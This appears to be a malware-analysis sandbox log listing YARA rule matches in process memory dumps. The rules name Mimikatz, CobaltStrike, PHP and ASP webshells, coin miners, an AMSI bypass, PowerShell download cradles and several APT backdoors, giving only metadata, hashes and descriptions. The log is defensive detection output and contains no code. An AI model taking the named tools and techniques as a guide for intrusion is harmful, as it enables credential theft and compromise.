Source: 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 0000000B.00000003.18312990479.0000021B5F514000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp, type: MEMORY Matched rule: CVE_2018_4878_0day_ITW Description = This signature is mostly public sourced and detects an in-the-wild exploit for CVE-2018-4878., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000B.00000003.18261319669.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 0000000B.00000003.18309206155.0000021B5F922000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18286653567.0000021B5F85C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp, type: MEMORY Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 0000000B.00000003.18295010840.0000021B5EF98000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18316812162.0000021B5EB76000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18310588191.0000021B5F514000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp, type: MEMORY Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000003.18306864011.0000021B5DF46000.00000004.00000001.sdmp, type: MEMORY Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18271875612.0000021B5DFCB000.00000004.00000001.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 0000000B.00000003.18301160882.0000021B5F0A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18301160882.0000021B5F0A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18319660937.0000021B5EB76000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 0000000B.00000003.18314132801.0000021B5FCD5000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18284863225.0000021B5E924000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 0000000B.00000003.18295574601.0000021B5F0A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18295574601.0000021B5F0A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 0000000B.00000003.18268155415.0000021B5F965000.00000004.00000001.sdmp, type: MEMORY Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 0000000B.00000003.18268155415.0000021B5F965000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18296480454.0000021B5DF04000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18298785440.0000021B5EB76000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18312010559.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 0000000B.00000003.18297885481.0000021B5F796000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp, type: MEMORY Matched rule: HackTool_Samples description = Hacktool, score =
Source: 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp, type: MEMORY Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: 0000000B.00000003.18317798030.0000021B5E551000.00000004.00000001.sdmp, type: MEMORY Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 0000000B.00000003.18322267156.0000021B5F6D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 0000000B.00000003.18278226414.0000021B5E924000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 0000000B.00000003.18266771415.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 0000000B.00000003.18266771415.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000003.18266771415.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18266771415.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp, type: MEMORY Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp, type: MEMORY Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp, type: MEMORY Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 0000000B.00000003.18273280892.0000021B5F922000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18292386350.0000021B5F01C000.00000004.00000001.sdmp, type: MEMORY Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 0000000B.00000003.18300431925.0000021B5E6BC000.00000004.00000001.sdmp, type: MEMORY Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18309993553.0000021B5F514000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 0000000B.00000003.18299369351.0000021B5F922000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18309596574.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 0000000B.00000003.18309596574.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000003.18309596574.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18309596574.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18274964838.0000021B5EE90000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18291811520.0000021B5EF98000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18293242978.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 0000000B.00000003.18293242978.0000021B5FEA2000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
